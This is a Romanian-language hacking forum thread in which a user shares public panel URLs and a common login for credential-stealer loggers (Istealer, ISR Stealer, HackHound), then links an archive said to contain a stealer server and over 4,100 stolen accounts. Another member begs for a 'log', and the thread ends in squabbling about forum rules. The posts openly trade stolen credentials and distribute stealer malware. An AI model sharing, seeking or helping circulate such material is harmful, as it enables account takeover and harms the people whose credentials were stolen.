Jump to content
xpt1

Php Loggere publice

Recommended Posts

Istealer si (alte) softuri ce folosesc acelasi logger

ShortUrlS Ist Panel

http://accounts.look.in/0/index.php

ISR Stealer, HackHound si (alte) softuri ce folosesc acelasi logger

ShortUrlS ISR Panel

http://accounts.look.in/1/index.php

User: rst

Password: rst

Daca mai doriti, mai pot adauga. Sau daca doriti sa va faceti, panelul, public, alaturi de user si parola, puteti posta aici.

Nota: am postat topicul in Stuff Tools, deoarece nu este un program de hack, ci un site cu care putem sa ne "sharuim" logurile...

Edited by xpt1
Link to comment
Share on other sites

Guest User Name

nesimtita lumea de pe forum,ma gandeam ca am si eu ce sa fac in seara asta,dar din pacate vad ca nu se poate:|

ma poate ajuta cineva cu un log ,va rog din suflet,astept PM,doar PM,va rog:|!

Link to comment
Share on other sites

pai... daca vrei... am cules eu, de pe net cu folosint (asupra mea) algoritmul urmator:

#include <googleit.h>
#include <savefile.h>
#include <copypaste.h>
#include <finded.h>
#include <keep.h>
int cp()
{
copy();
paste();
}
//
int main(){
for (i=1000)
{
search();
if (finded()
{
cp();
save();
}
else
break;
}
keep();
return 0;
}

Link to comment
Share on other sites

Am remediat problema cu userul si parola...

Cat despre log....

1. In acele panouri nu erau loguri

2. Am uploadat o arhiva cu conturi... stranse de la altii (de pe net)

accounts.look.in - URL Shortening Script

http://accounts.look.in/?logs01

In arhiva sunt un server, un fisier (extensia .reg) care face posibil muti-mess-ul si fisierul cu peste 4100 conturi... nu stiu cate mai merg...

Daca mai sunt probleme, va rog sa specificati!

Si, cred eu, ar fi o idee buna sa facem, undeva, un topic in care sa punem adresele de download ale serverelor facute de noi, userii forumului...

Edited by xpt1
Link to comment
Share on other sites

Pai tot asta vreau si eu, doar ca sa fie folosit de membrii forumului...

Iar chestia cu "doar membrii cu peste n posturi sa poata vedea"... de ce nu se pune un sistem de "thanks"-uri, iar cine are peste... yo stiu... 50 sa poata vedea articolele altora... altfel, numai pe ale lor...

Adica, eu, gogu' vreau sa postez ceva ce cred ca ar putea interesa... intru in topicul respectiv, vad titlurile si, in loc de link, un text jumate sters, daca nu am cele n (50 de) thanks-uri, iar daca am peste cele n, vad normal, link-uri spre articol(e). Daca am mai putin de n posturi, pot sa vad doar articolele mele, iar daca am peste n, pot sa le vad pe ale tuturor celor care au postat in acea sectiune...

cum vi-se pare?

Link to comment
Share on other sites

Parerea mea ? hai posteaza 50 de tutoriale facute de tine sa vedem, crezi ca toti useri stiu sa posteze tutoriale ?

Parerea mea e ca mai intai sa-ti stergi posturile copiate de pe forumul RST pe jegul tau de forum si peorma sa comentezi,ok?

Link to comment
Share on other sites

Moderaatorii nu pot?

Acu', pe bune, vrei 50 de tutoriale facite de mine?

Ia vezi, poate-ti trantesc un tutorial direct din interiorul pistolului pe care, oricial nu-l am...

Daca ai avea sute de posturi, te-as crede sa fii increzut, da' asa... ce draq* vrei din plm* ? Laptele?

Nota: Nici neoficial nu-l am...

Edit: Cam multe injuraturi, pe forum, de la un timp... unde-s adminii?

Ok, sunt sarbatorile... dar... stergeti dreaq*-lui, toate mesajele cu injuraturi... sau faceti un search in baza de date, dupa cuvinte obscene... sigur veti gasi un dictionar intreg....

Edited by xpt1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...